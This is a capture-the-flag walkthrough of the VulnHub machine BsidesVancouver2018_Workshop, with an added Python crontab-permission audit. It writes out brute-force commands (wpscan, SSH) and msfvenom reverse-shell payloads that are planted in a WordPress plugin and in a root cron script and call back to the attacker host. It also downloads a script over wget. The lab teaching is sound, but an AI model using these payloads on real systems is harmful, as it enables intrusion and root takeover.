BsidesVancouver2018_Workshop – VulnHub

In this CTF writeup I am going to give you a walkthrough of "BsidesVancouver2018_Workshop", a vulnerable machine designed for security enthusiasts to improve their vulnerability assessment and penetration testing skills.
You can download this machine from the VulnHub link provided.

This CTF is part of the BSides Vancouver series. It is an entry-level boot2root web-based challenge. The goal is to gain root privileges through a web application hosted on this vulnerable machine.

1. Start with nmap -A 10.10.10.6

The nmap results show 3 open ports: 21 (FTP with anonymous login allowed), 22 (SSH) and 80 (HTTP).
Let's try these one by one.


2. ftp 10.10.10.6 with the login name anonymous: we get a file containing usernames.

Now open the file we got:
cat /root/Desktop/users.txt.bk


3. Now let's try port 80: open 10.10.10.6 in a browser.
The response shows that the site is working.

Now let's try /backup_wordpress
Voila! We get a backup of the website, and it seems the admin username is John.
Scroll down and you get the WordPress login.


4. Now brute-force the WordPress login:
wpscan --url http://10.10.10.6/backup_wordpress/wp-login.php --wordlist /root/10k-most-common.txt --username john --wp-content-dir wp-content

From the wpscan brute force we get an unknown response for "enigma".
Let's try this as the password for john (Username: john, Password: enigma).

We get the WordPress Dashboard.


5. Now create a payload to get a Meterpreter session:

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.5 lport=4545 -f raw

From the Dashboard go to Plugins -> Installed Plugins -> Hello Dolly -> Edit.
Now paste the generated payload into the plugin and save.


6. Open Metasploit and type the commands as shown in the screenshot.

Go to Plugins and click Activate.
Once you click Activate you will get the Meterpreter session.
Type shell and you will get a limited shell.


7. Now go to the /tmp directory and download a Linux privilege checker using wget.

On the attacking machine, place the Linux privilege checker in a directory and serve it with python -m SimpleHTTPServer 8080, then on the target:
wget http://10.10.10.5:8080/LinuxPrivilegechecker.py
Change the permissions to make it executable and run the script.

As a result we can see a cron job running every minute as root.

Now let's check what it is doing.

It's cleaning the Apache logs every minute.

Now let's create a reverse shell payload and replace the cleanup file with it:

msfvenom -p cmd/unix/reverse_python lhost=10.10.10.5 lport=5555 R>cleanup

Replace the original file with this and you will get a reverse connection.
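Step 7 works only because a root cron job executes a script that an unprivileged user can overwrite. As an added example (not code from this writeup or from the VulnHub image), the following audit flags that class of misconfiguration in a system-style crontab; the crontab and cleanup file it builds are constructed stand-ins for the ones on the box.

```python
import os
import tempfile

def parse_system_crontab(text):
    """Yield (user, command) per job line of /etc/crontab-style files; skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)  # min hour dom mon dow user command
        if len(parts) == 7:
            yield parts[5], parts[6]

def weak_perms(path):
    """Return the ownership/permission problems that let a non-root user change what root runs."""
    st = os.stat(path)
    problems = []
    if st.st_mode & 0o022:  # group- or world-writable
        problems.append("writable by group/other")
    if st.st_uid != 0:
        problems.append("not owned by root (uid %d)" % st.st_uid)
    return problems

def audit_crontab(path):
    """Return (user, executable, problem) for each root job whose executable
    (first token of the command) an unprivileged user could modify."""
    findings = []
    with open(path) as fh:
        for user, command in parse_system_crontab(fh.read()):
            target = command.split()[0]
            if user != "root" or not os.path.isabs(target) or not os.path.exists(target):
                continue  # only root jobs with resolvable absolute paths are checked
            for problem in weak_perms(target):
                findings.append((user, target, problem))
    return findings

def build_demo(mode=0o777):
    """Construct a throwaway crontab and a 'cleanup' script with the given mode,
    mirroring the every-minute root log-cleaning job found on the box (constructed data)."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "cleanup")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\nrm -f /var/log/apache2/*.log\n")
    os.chmod(script, mode)  # 0o777 is the misconfiguration: any local user can rewrite it
    tab = os.path.join(d, "crontab")
    with open(tab, "w") as fh:
        fh.write("SHELL=/bin/sh\n* * * * * root %s\n" % script)
    return tab, script
```

Run audit_crontab over /etc/crontab and each file in /etc/cron.d to find such jobs; a root-owned script with mode 0755 produces no "writable" finding.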


8. An alternate way is SSH brute-forcing the accounts we got from users.txt.bk.
The users abatchy, john and mai have key-based authentication.

For anne we get a password prompt, so start the brute-force attack there.
